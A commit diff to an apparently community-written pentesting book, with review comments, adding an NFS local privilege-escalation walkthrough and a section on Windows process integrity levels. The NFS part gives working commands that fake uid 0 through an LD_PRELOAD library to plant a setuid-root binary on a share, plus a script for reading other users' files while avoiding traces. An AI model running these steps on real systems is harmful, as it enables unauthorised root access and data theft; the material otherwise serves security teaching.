GitBook: [master] 367 pages and 2 assets modified

This commit is contained in:
CPol 2020-08-28 13:26:57 +00:00 committed by gitbook-bot
parent 56f35577c1
commit ee64647d8b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 69 additions and 7 deletions


@ -46,7 +46,10 @@ cd <SHAREDD_FOLDER>
### Local Exploit
{% hint style="info" %}
Note that if you can create a tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports.
Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.
The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.
Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.
--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_--
{% endhint %}
**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs_privesc.html)\*\*\*\*
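Review bot: the added hint contradicts itself: "The following trick is in case the file `/etc/exports` **indicates an IP**" says the local trick exists for the IP-restricted export, while the new "--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_--" says the opposite; keep one statement and drop the other. The path is spelled both `/etc/exports` and `/etc/export` (the file is `/etc/exports`), "Another required requirement" reads better as "A second requirement", and the trailing `\*\*\*\*` after the errno.fr link renders as stray asterisks. The `insecure` requirement also deserves its one-line reason: with the default `secure` option the server only accepts requests from source ports below 1024, which an unprivileged libnfs client cannot bind to, so the trick depends on that flag being present.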
@ -69,10 +72,13 @@ Heres a [library that lets you do just that](https://github.com/sahlberg/libn
#### Compiling the example <a id="compiling-the-example"></a>
Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscall. Due to the absence of cmake on the system, I also needed to link against the precompiled library which can be [found here](https://sites.google.com/site/libnfstarballs/li).
Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscalls.
```bash
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L../libnfs-1.11.0/lib/.libs/
./bootstrap
./configure
make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
```
#### Exploiting using the library <a id="exploiting-using-the-library"></a>
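Review bot: the new block never states its working directory; `./bootstrap`, `examples/ld_nfs.c`, `-I./include/` and `-L./lib/.libs/` all assume the root of a libnfs source checkout, so a short lead-in ("from the libnfs source directory") would prevent the same confusion the old `-L../libnfs-1.11.0/lib/.libs/` path caused. Since the sentence about missing cmake and the precompiled library was removed, name the prerequisite that replaces it: `./bootstrap` needs autoconf, automake and libtool installed. Minor: the context line "Heres a library" is missing its apostrophe.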
@ -88,10 +94,10 @@ gcc pwn.c -o a.out
Place our exploit on the share and make it suid root by faking our uid in the RPC calls:
```text
LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
```
All thats left is to launch it:
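Review bot: adding `LD_LIBRARY_PATH=./lib/.libs/` is the right fix for an in-tree build that was never installed, but it and `LD_PRELOAD=./ld_nfs.so` are both relative, so the four commands only work from the libnfs source root while `../a.out` points one level up; say so or switch to absolute paths. The ordering in the block is worth a sentence too: keep `chown root:` before `chmod u+s`, since a later ownership change can clear the setuid bit. Minor: "All thats left" is missing its apostrophe.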
@ -103,3 +109,39 @@ All thats left is to launch it:
There we are, local root privilege escalation!
### Bonus NFShell <a id="bonus-nfshell"></a>
Once local root on the machine, I wanted to loot the NFS share for possible secrets that would let me pivot. But there were many users of the share all with their own uids that I couldnt read despite being root because of the uid mismatch. I didnt want to leave obvious traces such as a chown -R, so I rolled a little snippet to set my uid prior to running the desired shell command:
```python
#!/usr/bin/env python
import sys
import os
def get_file_uid(filepath):
try:
uid = os.stat(filepath).st_uid
except OSError as e:
return get_file_uid(os.path.dirname(filepath))
return uid
filepath = sys.argv[-1]
uid = get_file_uid(filepath)
os.setreuid(uid, uid)
os.system(' '.join(sys.argv[1:]))
```
You can then run most commands as you normally would by prefixing them with the script:
```text
[root@machine .tmp]# ll ./mount/
drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
[root@machine .tmp]# ls -la ./mount/9.3_old/
ls: cannot open directory ./mount/9.3_old/: Permission denied
[root@machine .tmp]# ./nfsh.py ls --color -l ./mount/9.3_old/
drwxr-x--- 2 1008 1009 1024 Apr 5 2017 bin
drwxr-x--- 4 1008 1009 1024 Apr 5 2017 conf
drwx------ 15 1008 1009 1024 Apr 5 2017 data
drwxr-x--- 2 1008 1009 1024 Apr 5 2017 install
```
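Review bot: `get_file_uid` has no base case. For a relative path that does not exist, `os.path.dirname` eventually returns `''`, `os.stat('')` raises, and the function calls itself with `''` until `RecursionError`; for an absolute path that fails all the way up, `os.path.dirname('/')` is `'/'` and it loops the same way. Normalise with `os.path.abspath(filepath)` first and stop when `os.path.dirname(p) == p`. `os.setreuid` is also unchecked: it raises `PermissionError` when the script is not run as root, which is the only situation it is written for, so a clear error message would help more than a traceback. Note as well that `sys.argv[-1]` is only the target path when the path is the last argument, which the transcript's `ls --color -l ./mount/9.3_old/` satisfies but not every command will. Minor: "couldnt", "didnt" and "thats" are missing apostrophes.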

@ -6,6 +6,26 @@ If you want to **know** about my **latest modifications**/**additions**, **join
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
## Process Integrity Levels
From Windows Vista, all **protected objects are labeled with an integrity level**. Most user and system files and registry keys on the system have a default label of “medium” integrity. The primary exception is a set of specific folders and files writeable by Internet Explorer 7 at Low integrity. **Most processes** run by **standard users** are labeled with **medium integrity** \(even the ones started by a user inside the administrators group\), and most **services** are labeled with **System integrity**. The root directory is protected by a high-integrity label.
There are several levels of integrity:
* **Untrusted** processes that are logged on anonymously are automatically designated as Untrusted. _Example: Chrome_
* **Low** The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the **Temporary Internet Folder**, are also assigned the **Low integrity** level by default. However, note that a **low integrity process** is very **restricted**, it **cannot** write to the **registry** and its limited from writing to **most locations** in the current users profile. _Example: Internet Explorer or Microsoft Edge_
* **Medium** Medium is the context that **most objects will run in**. Standard users receive the Medium integrity level, and any object not explicitly designated with a lower or higher integrity level is Medium by default. Not that a user inside the Administrators group by default will use medium integrity levels.
* **High** **Administrators** are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users can not do. _Example: "Run as Administrator"_
* **System** As the name implies, the System integrity level is reserved for the system. The Windows kernel and core services are granted the System integrity level. Being even higher than the High integrity level of Administrators protects these core functions from being affected or compromised even by Administrators. Example: Services
* **Installer** The Installer integrity level is a special case and is the highest of all integrity levels. By virtue of being equal to or higher than all other WIC integrity levels, objects assigned the Installer integrity level are also able to uninstall all other objects.
You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
![](../../.gitbook/assets/image%20%28349%29.png)
You can also get your **current integrity level** using `whoami /groups`
![](../../.gitbook/assets/image%20%28350%29.png)
## System Info
### Version info enumeration
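Review bot: "Not that a user inside the Administrators group by default will use medium integrity levels" should read "Note that ..." (likewise "its limited" should be "it's limited" and "current users profile" should be "current user's profile"). "WIC" in the Installer bullet is never expanded; spell out Windows Integrity Control on first use. The `whoami /groups` line would be more useful with what to look for: the level is listed as the group `Mandatory Label\Medium Mandatory Level` (or `Low`, `High`, `System`), so the reader can find it without the screenshot.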